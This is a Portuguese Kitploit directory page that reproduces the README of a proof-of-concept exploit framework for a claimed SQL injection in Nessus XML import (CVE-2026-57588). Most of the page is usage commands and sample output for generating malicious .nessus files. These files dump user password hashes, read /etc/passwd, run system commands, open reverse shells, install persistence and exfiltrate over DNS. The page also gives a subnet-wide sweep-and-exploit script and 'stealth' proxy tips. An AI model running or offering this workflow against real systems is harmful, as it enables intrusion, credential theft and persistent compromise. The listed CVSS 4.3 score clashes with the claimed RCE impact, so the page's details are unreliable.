Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — PoC para CVE-2026-57588 - Injeção SQL na importação XML do Nessus 10.12.0. Gera arquivos .nessus maliciosos para enumerar bancos de dados, exfiltrar credenciais e testar injeção cega baseada em tempo. Para pesquisa de segurança autorizada. Autor: Sudeepa Wanigarathna. Corrigido na versão 10.12.1. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosPós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
Segurança de Banco de Dados
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

Ver Repositório
11há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

PoC para CVE-2026-57588 - Injeção SQL na importação XML do Nessus 10.12.0. Gera arquivos .nessus maliciosos para enumerar bancos de dados, exfiltrar credenciais e testar injeção cega baseada em tempo. Para pesquisa de segurança autorizada. Autor: Sudeepa Wanigarathna. Corrigido na versão 10.12.1.

Compartilhar

🛡️ CVE-2026-57588 - Framework de Exploração de Injeção SQL no Nessus

Security Research CVE Version Python License


📋 Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Recursos
  • Instalação
  • Início Rápido
  • Exemplos de Uso
  • Tipos de Payload
  • Cenários Avançados
  • Relatórios
  • Solução de Problemas
  • Considerações de Segurança
Licença

🔍 Visão Geral

CVE-2026-57588 é uma vulnerabilidade crítica de injeção SQL descoberta no Tenable Nessus versões 10.12.0 e anteriores. A vulnerabilidade reside no mecanismo de análise de XML ao importar arquivos de resultados de varredura .nessus, permitindo que usuários autenticados com privilégios de importação executem consultas SQL arbitrárias no banco de dados PostgreSQL de backend.


⚠️ Detalhes da Vulnerabilidade

PropriedadeValor
ID do CVECVE-2026-57588
Tipo de VulnerabilidadeInjeção SQL
Produtos AfetadosTenable Nessus 10.12.0 e anteriores
Versão CorrigidaNessus 10.12.1 e posteriores
Pontuação CVSS4.3 (Média)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosAutenticado (permissões de importação)
Interação do UsuárioNecessária (engenharia social)
ImpactoExfiltração de dados, RCE

🔬 Detalhes Técnicos

A vulnerabilidade existe devido à sanitização insuficiente dos valores das tags XML antes de serem incorporados em consultas SQL durante o processo de importação. Um agente malicioso pode criar um arquivo .nessus contendo payloads de injeção SQL especialmente elaborados em tags XML, tais como:

  • hostname
  • fqdn
  • os
  • system-type
  • mac-address
  • netbios-name

Quando um usuário privilegiado importa o arquivo malicioso, os valores não sanitizados são executados no backend PostgreSQL, permitindo:

  • Enumeração do banco de dados
  • Exfiltração de dados
  • Execução de comandos
  • Acesso ao sistema de arquivos
  • Instalação de persistência

✨ Recursos

Clique para expandir a lista de recursos

🎯 Gerenciamento de Payloads

  • 13+ tipos de payload categorizados por finalidade
  • Geração de payload baseada em modelos
  • Criação e validação de payloads personalizados
  • Validação de parâmetros e verificação de sintaxe
  • Verificação de sintaxe SQL

🚀 Capacidades de Exploração

  • Exploração multi-estágio com execução paralela
  • Identificação (fingerprinting) e enumeração do banco de dados
  • Exfiltração de dados com seleção personalizada de tabela/coluna
  • Execução de comandos no sistema alvo
  • Acesso e leitura do sistema de arquivos
  • Reverse shell com sessão interativa
  • Mecanismos de instalação de persistência
  • Injeção SQL cega baseada em tempo
  • Injeção SQL cega baseada em booleano
  • Injeção SQL baseada em erros
  • Consultas empilhadas para exploração avançada
  • Exfiltração fora de banda (out-of-band) via DNS

📊 Relatórios e Logs

  • Relatórios HTML com estilo profissional
  • Relatórios Markdown para documentação
  • Relatórios JSON para automação
  • Relatórios de texto para revisão rápida
  • Rotação de logs com múltiplos níveis
  • Estatísticas detalhadas de execução
  • Hash de arquivos para verificação de integridade

🛠️ Recursos Avançados

  • Execução paralela com tarefas configuráveis
  • Suporte a proxy para operações furtivas
  • Gerenciamento de certificados SSL/TLS
  • Validação de XML e verificação de esquema
  • Modo interativo para exploração ao vivo
  • Mecanismo de repetição (retry) para confiabilidade
  • Configuração de timeout para conexões lentas

📦 Ferramentas Profissionais

  • Estrutura de CLI baseada em subcomandos
  • Modos verboso e silencioso
  • Saída de terminal colorida
  • Indicadores de progresso para tarefas longas
  • Suporte a Docker para testes em contêineres
  • Compatibilidade multiplataforma (Linux, Windows, macOS)

📦 Instalação

🐍 Pré-requisitos

  • Python 3.7 ou superior
  • pip (gerenciador de pacotes do Python)
  • Git (opcional, para clonagem)

🔧 Instalação Rápida

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Create and activate virtual environment
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

🐳 Instalação via Docker

root@kitploit:~
# Build the Docker image
docker build -t nessus-exploit .

# Run the tool
docker run -it --rm nessus-exploit generate -u https://test.com -p enum

📦 Instalação como Pacote

root@kitploit:~
# Install as a package
pip install -e .

# Now you can run from anywhere
nessus-exploit generate -u https://test.com -p enum

🚀 Início Rápido

Uso Básico

root@kitploit:~
# Generate a basic enumeration exploit
python3 exploit.py generate -u https://test.com -p enum

# Generate advanced multi-stage exploit
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus

# Extract data from database
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

Ajuda de Comandos

root@kitploit:~
# Show general help
python3 exploit.py --help

# Show generate command help
python3 exploit.py generate --help

# List all available payloads
python3 exploit.py list

💡 Exemplos de Uso

1. Enumeração Básica

root@kitploit:~
python3 exploit.py generate -u https://test.com -p enum
Saída Esperada
root@kitploit:~
[2026-07-22 10:15:23] [INFO] [*] Starting exploitation against https://test.com
[2026-07-22 10:15:23] [INFO] [*] Session: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Payload: enum
[2026-07-22 10:15:23] [INFO] [*] Executing stage: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Generated XML: exploit_20260722_fingerprint_101523.nessus (3847 bytes)
[2026-07-22 10:15:24] [INFO] [*] Executing stage: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Generated XML: exploit_20260722_schema_dump_101524.nessus (4213 bytes)
[2026-07-22 10:15:25] [INFO] [+] Exploitation complete! Duration: 2.15s

============================================================
EXPLOITATION SUMMARY
============================================================
Target: https://test.com
Status: SUCCESS
Duration: 2.15s
Files Generated: 3
Reports Generated: 3
============================================================

2. Exploração Multi-Estágio Avançada

root@kitploit:~
python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v

3. Exfiltração de Dados

root@kitploit:~
# Extract user credentials
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Extract with custom columns
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status

4. Reverse Shell

root@kitploit:~
# Start listener and generate exploit
python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus

5. Execução de Comandos

root@kitploit:~
# Execute basic commands
python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"

# Execute complex commands
python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"

6. Leitura de Arquivos

root@kitploit:~
# Read system files
python3 exploit.py generate -u https://test.com -p file -f /etc/passwd

# Read application logs
python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log

7. Injeção Cega Baseada em Tempo

root@kitploit:~
# 5-second delay
python3 exploit.py generate -u https://test.com -p sleep -s 5

# 30-second delay for heavy tests
python3 exploit.py generate -u https://test.com -p sleep -s 30

8. Com Suporte a Proxy

root@kitploit:~
# HTTP proxy
python3 exploit.py generate -u https://test.com -p advanced --proxy http://127.0.0.1:8080

# HTTPS proxy with authentication
python3 exploit.py generate -u https://test.com -p advanced --proxy https://user:[email protected]:8080

9. Execução Paralela

root@kitploit:~
# Run with 8 parallel jobs
python3 exploit.py generate -u https://test.com -p advanced --jobs 8

# With custom timeout and retries
python3 exploit.py generate -u https://test.com -p advanced --jobs 4 --timeout 60 --retries 5

10. Modos Verboso e Silencioso

root@kitploit:~
# Verbose mode (detailed output)
python3 exploit.py generate -u https://test.com -p advanced -v --log-file debug.log

# Quiet mode (minimal output)
python3 exploit.py generate -u https://test.com -p advanced -q

📚 Tipos de Payload

Categoria: FINGERPRINTING

PayloadDescriçãoParâmetros
fingerprintIdentificação (fingerprinting) do banco de dadosNenhum

Categoria: UNION

PayloadDescriçãoParâmetros
schema_dumpDump do esquema do banco de dadosNenhum
data_exfilExtrair dados da tabelatable, columns

Categoria: TIMING

PayloadDescriçãoParâmetros
time_basedInjeção cega baseada em tempodelay
boolean_blindCega baseada em booleanocondition, delay

Categoria: FILE_ACCESS

PayloadDescriçãoParâmetros
file_readLer arquivos do sistemapath, offset, length

Categoria: COMMAND_EXEC

PayloadDescriçãoParâmetros
command_execExecutar comandos do sistemacommand

Categoria: REVERSE_SHELL

PayloadDescriçãoParâmetros
reverse_shellEstabelecer reverse shellhost, port

Categoria: PERSISTENCE

PayloadDescriçãoParâmetros
persistenceInstalar persistênciaNenhum

Categoria: ERROR_BASED

PayloadDescriçãoParâmetros
error_basedInjeção baseada em errosquery

Categoria: STACKED

PayloadDescriçãoParâmetros
stacked_queriesConsultas empilhadasquery

Categoria: OUT_OF_BAND

PayloadDescriçãoParâmetros
oob_dnsExfiltração via DNShost, data

🎯 Cenários Avançados

Cenário 1: Fluxo de Trabalho de Comprometimento Completo

root@kitploit:~
# Step 1: Enumerate the database
python3 exploit.py generate -u https://test.com -p enum -v

# Step 2: Extract sensitive data
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Step 3: Establish persistence
python3 exploit.py generate -u https://test.com -p persist

# Step 4: Set up reverse shell
python3 exploit.py generate -u https://test.com -p shell -lp 4444

Cenário 2: Operações Furtivas

root@kitploit:~
# Using proxy and quiet mode
python3 exploit.py generate -u https://test.com -p advanced \
    --proxy http://127.0.0.1:8080 \
    --no-ssl-verify \
    -q \
    -o stealth_scan.nessus

Cenário 3: Pipeline de Testes Automatizados

root@kitploit:~
#!/bin/bash
# auto_exploit.sh - Automated exploitation script

TARGET="https://test.com"
OUTPUT_DIR="./results_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT_DIR

# Run all payloads
for payload in enum dump shell persist; do
    echo "[*] Running payload: $payload"
    python3 exploit.py generate -u $TARGET -p $payload -o "$OUTPUT_DIR/${payload}_scan.nessus" -q
done

# Generate comprehensive report
python3 exploit.py report -i "$OUTPUT_DIR" -o "$OUTPUT_DIR/final_report"

Cenário 4: Avaliação de Segurança Corporativa

root@kitploit:~
# Network-wide assessment
for target in $(nmap -p 8834 --open 192.168.1.0/24 | grep "Nessus" | awk '{print $5}'); do
    echo "[*] Testing: $target"
    python3 exploit.py generate -u "https://$target" -p advanced -o "scan_${target}.nessus" -q
done

Cenário 5: Coleta de Evidências

root@kitploit:~
# Collect comprehensive evidence
python3 exploit.py generate -u https://test.com -p advanced \
    --file /etc/hosts \
    --command "systemctl status nessusd" \
    --table nessus_users \
    --columns username,password_hash,email,last_login \
    -v \
    --log-file evidence.log

📊 Relatórios

Formatos de Relatório Disponíveis

FormatoDescriçãoUso
HTMLRelatório HTML profissional com estilização--format html
MarkdownFormato Markdown para documentação--format markdown
JSONJSON para automação--format json
TextoTexto simples para revisão rápida--format text

Gerar Relatórios

root@kitploit:~
# Generate all report formats
python3 exploit.py report -i results.json -o report

# Generate HTML report only
python3 exploit.py report -i results.json -o report.html --format html

# Generate Markdown report
python3 exploit.py report -i results.json -o report.md --format markdown

Conteúdo do Relatório

  • Informações do alvo
  • ID da sessão e tipo de payload
  • Estatísticas de execução
  • Lista de arquivos gerados
  • Hashes de arquivos para integridade
  • Logs de erros (se houver)
  • Avisos legais e alertas

🔧 Solução de Problemas

Problemas Comuns e Soluções

Problema 1: Erros de Conexão
root@kitploit:~
# Error: Connection refused
# Solution: Check if Nessus is running and port is accessible
python3 exploit.py generate -u https://test.com:8834 -p enum

# Error: SSL certificate verification failed
# Solution: Disable SSL verification
python3 exploit.py generate -u https://test.com -p enum --no-ssl-verify
Problema 2: Erros de Validação de XML
root@kitploit:~
# Error: Invalid XML structure
# Solution: Disable XML validation
python3 exploit.py generate -u https://test.com -p enum --no-validate
Problema 3: Erros de Payload
root@kitploit:~
# Error: Missing required parameter
# Solution: Check payload requirements
python3 exploit.py validate -p command_exec

# Then provide required parameters
python3 exploit.py generate -u https://test.com -p exec --command "whoami"
Problema 4: Permissão Negada
root@kitploit:~
# Error: Cannot write files
# Solution: Check directory permissions
chmod 755 ./outputs/
python3 exploit.py generate -u https://test.com -p enum -o ./outputs/scan.nessus
Problema 5: Problemas de Timeout
root@kitploit:~
# Error: Operation timed out
# Solution: Increase timeout
python3 exploit.py generate -u https://test.com -p advanced --timeout 120

# Or use retries
python3 exploit.py generate -u https://test.com -p advanced --retries 5

🔐 Considerações de Segurança

⚠️ Avisos Importantes

  1. Conformidade Legal: Use apenas em sistemas seus ou para os quais você tenha permissão explícita por escrito para testar
  2. Proteção de Dados: Trate credenciais e dados extraídos com extremo cuidado
  3. Ambiente Isolado: Sempre teste em ambientes de laboratório isolados
  4. Backup: Sempre faça backup dos bancos de dados antes de testar
  5. Restauração: Restaure os sistemas ao estado original após o teste
  6. Documentação: Documente todas as atividades de teste para conformidade

✅ Boas Práticas

  1. Use contas de teste dedicadas
  2. Mantenha logs detalhados de todas as ações
  3. Use VPN/proxy para anonimato ao testar sistemas de terceiros
  4. Siga as diretrizes de divulgação responsável
  5. Eduque sua equipe sobre a vulnerabilidade

📝 Licença

Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.


🤝 Contribuindo

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

Configuração de Desenvolvimento

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Install development dependencies
pip install -r requirements-dev.txt

# Run tests
pytest

# Format code
black exploit.py

# Check linting
flake8 exploit.py

📞 Suporte

Documentação

  • Advisory de Segurança Oficial da Tenable
  • Entrada no Banco de Dados de CVE
  • Documentação do Nessus

Contato

  • Autor: Sudeepa Wanigarathna
  • E-mail: [email protected]
  • GitHub: CerberusMrXi

📄 Histórico de Alterações

Versão 1.0.0 (2026-07-22)

Lançamento Inicial

  • ✅ Framework abrangente de exploração
  • ✅ 13 tipos de payload categorizados por finalidade
  • ✅ Exploração multi-estágio com execução paralela
  • ✅ Validação de XML e verificação de esquema
  • ✅ Múltiplos formatos de relatório (HTML, Markdown, JSON, Text)
  • ✅ Hash automático de arquivos e verificação de integridade
  • ✅ Registro profissional com rotação
  • ✅ Suporte a proxy para operações furtivas
  • ✅ Reverse shell com sessão interativa
  • ✅ Mecanismos de persistência
  • ✅ Execução de comandos e leitura de arquivos
  • ✅ Injeção cega baseada em tempo e em booleano
  • ✅ Injeção baseada em erros e consultas empilhadas
  • ✅ Exfiltração fora de banda via DNS
  • ✅ Suporte a Docker
  • ✅ Compatibilidade multiplataforma

⬆ Voltar ao Topo


⚠️ AVISO LEGAL: Esta ferramenta é SOMENTE para testes de segurança EDUCACIONAIS e AUTORIZADOS. O uso não autorizado é ILEGAL. O autor NÃO SE RESPONSABILIZA por uso indevido.

Baixar ferramenta